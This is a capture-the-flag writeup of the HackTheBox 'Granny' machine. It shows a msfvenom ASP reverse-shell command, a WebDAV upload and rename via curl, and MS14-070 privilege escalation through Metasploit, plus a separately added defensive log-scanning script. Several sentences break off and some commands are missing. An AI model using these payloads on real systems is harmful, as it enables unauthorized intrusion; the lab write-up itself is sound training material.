HackTheBox: Granny - Writeup
20/04/2019 06:30
HackTheBox: Granny was another easy machine to get into. Privilege escalation was problematic, but it was a good lesson on how to deal with broken exploits.
I first started by doing a port scan of Granny.
Visiting the website and running dirb revealed that the website is full of initial configuration files, as it appears that the website has not been set up yet or is misconfigured. However, the port scan revealed that HTTP WebDAV methods can be used. A good way to test for this is with
After looking around online, I found a good source on using curl for method requests:
Webdav curl examples link
Firstly, a shell needs to be generated to upload to the web server. Since the server is running ASP, as found in enumeration, an ASP shell can be generated through msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > rshell.asp
Curl is used for sending the reverse shell as a .txt file. Then the MOVE method is used to change the file extension to
The shell is initialised with 'curl http://10.10.10.15/rshell.asp' and a shell appears in the
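How the upload-then-rename sequence above looks from the server side, as an added example that is not part of the original writeup: a scan of IIS W3C extended logs for a client that PUTs a file, MOVEs it, and then requests a script with the same base name. The log lines, client addresses, field selection and the SCRIPT_EXTS list are constructed assumptions.

```python
import os.path

# Constructed IIS W3C extended log lines (sample data, not from the writeup's target).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-04-20 06:01:10 192.0.2.10 OPTIONS / 200
2019-04-20 06:02:31 192.0.2.10 PUT /rshell.txt 201
2019-04-20 06:02:40 192.0.2.10 MOVE /rshell.txt 201
2019-04-20 06:02:55 192.0.2.10 GET /rshell.asp 200
2019-04-20 06:04:00 192.0.2.77 PUT /notes.txt 201
2019-04-20 06:05:00 192.0.2.77 GET /default.asp 200
"""

# Assumption: extensions the server would execute rather than serve as static text.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer"}

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))

def find_upload_then_rename(text):
    """Flag a client that PUTs a file, MOVEs it, then requests a script of the same base name."""
    pending = {}  # (client ip, path without extension) -> {"uploaded": uri, "moved": bool}
    alerts = []
    for req in parse_w3c(text):
        if not req["sc-status"].startswith("2"):
            continue  # failed requests did not change anything on disk
        uri = req["cs-uri-stem"].lower()
        base, ext = os.path.splitext(uri)
        key, method = (req["c-ip"], base), req["cs-method"].upper()
        if method == "PUT":
            pending[key] = {"uploaded": uri, "moved": False}
        elif method == "MOVE" and key in pending:
            pending[key]["moved"] = True
        elif ext in SCRIPT_EXTS and key in pending and pending[key]["moved"]:
            alerts.append({"client": req["c-ip"], "uploaded": pending.pop(key)["uploaded"],
                           "executed": uri, "time": req["date"] + " " + req["time"]})
    return alerts

if __name__ == "__main__":
    for alert in find_upload_then_rename(SAMPLE_LOG):
        print(alert)
```

The correlation relies only on the method, URI stem and status columns, so it works even when the MOVE request's Destination header is not logged.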
3.1 Post exploitation
whoami /all reveals that I do not have a privileged shell; this will require further post enumeration to get a privileged shell.
sysinfo shows that the machine is an old version of Windows, running Windows Server 2003 SP2.
After some research, several local exploits have been found at:
The MS14-070 exploit appeared to be what I was looking for. The exploit was put onto the target machine the same way as the reverse shell. When executing the exploit, there was a problem with the exploit not working properly. The process was running but it was stuck.
To solve this, Metasploit is used to convert the shell to Meterpreter and migrate the process.
Convert shell to Meterpreter:
Execute the exploit in Metasploit:
Session 3 has been opened, and when opened it is a privileged Meterpreter shell. The root.txt is found on the desktop of the Administrator account, and success!